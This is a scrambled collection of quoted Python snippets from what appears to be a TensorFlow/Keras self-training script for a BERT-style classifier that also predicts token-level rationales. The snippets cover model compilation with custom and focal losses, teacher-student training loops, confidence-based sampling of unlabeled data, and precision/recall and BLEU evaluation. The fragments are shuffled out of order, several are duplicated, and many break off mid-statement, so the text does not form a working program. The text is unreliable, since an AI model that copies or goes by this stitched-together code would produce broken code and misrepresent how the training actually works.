attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\")", "restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss =", "on validation loss best_base_model = None best_validation_loss = np.inf for counter in range(N_base):", "1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted", "tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer,", "len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {}", "'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all self-training iterations", "axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro')))", "np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true,", "shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best", "y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1],", "{}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme))", "[], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student", "= model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred =", "in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint", "of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales", "logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size,", "for class {} : {}\".format(i, len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']),", "= tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1:", "test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred))", "if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if", "y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for", "= np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif", "= tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir,", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss},", "X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev,", "elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "{} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {} with", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'],", "[1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0,", "> 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train", "the base model n times with different initialization to select best base model", "probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch),", ": logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5,", "if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum()", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None},", "sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded", "X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True,", "with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss =", "score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro')))", "\"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\":", "shuffle from transformers import * import logging import math import models import numpy", "axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx =", "\"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train", "model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc", "X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size],", "saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc", "X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]}", "y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc =", "y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(),", "number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size,", "model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss =", "not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best)", "1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model", "y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number", "Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")])", "model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]),", "verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 =", "model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0],", "+=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale", "verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test),", "average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred =", "from sklearn.utils import shuffle from transformers import * import logging import math import", "\"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\":", "logger.info(\"BLEU-3 score of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score", "pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None,", "acc, y_pred = model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred,", "os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model", "(\"Class labels {}\".format(labels)) #split X and y to train and dev with valid_split", "None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task =", "None if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5,", "{}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0", "of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales", "dev with valid_split if valid_split > 0: train_size = int((1. - valid_split)*len(X[\"input_ids\"])) if", "logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn,", "logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X", "unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices])", "negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None},", "callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file", "acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for", "'joint' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc", "'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'],", "max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp =", "y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else:", "y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat", "X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:]", "test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss", "= np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale", "(macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if", "== 1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum()", "import math import models import numpy as np import os, sys import json", "text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i] temp['pred']", "class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc, test_pred,", "max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in", "type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None]", "model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred =", "'_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels))", "'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices]", "Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape)) logger.info(\"X Dev Shape: {} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test", "'joint' in type_: acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch", "temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the task label temp_t.append(temp[j])", "X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input for task: {}\".format(X_sample[\"input_ids\"][:5]))", "for run {} with total loss : {}\".format(counter, task_acc)) if 'mtl' in type_:", "acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices =", "np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0,", "elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))],", "= out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc =", "acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc,", "1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_:", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if", "acc for run {} with total loss : {}\".format(counter, task_acc)) if 'mtl' in", "\"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc = acc[:,None] #y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc =", "score of rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of", "train and dev with valid_split if valid_split > 0: train_size = int((1. -", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train,", "np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence", "truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data", "elif 'joint_neg' in type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred):", "rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True,", "tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss, SparseCategoricalFocalLoss import", "base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils", "Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier':", "'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels))", "= pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data,", "math import models import numpy as np import os, sys import json import", "in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_:", "len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train,", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev =", "best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best", "task acc for run {} with total loss : {}\".format(counter, task_acc)) if 'mtl'", "= np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set", "int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels", "= SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0,", "X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices],", "len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0],", "{}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0", "sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices],", "not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc", "y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc =", "nltk import tensorflow as tf import tensorflow.keras as K import tensorflow.keras.backend as kb", "'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg =", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal'", "if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class", "base model n times with different initialization to select best base model based", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"),", "coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.1*l1_loss +", "X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if", "= task_acc best_val_acc = task_acc 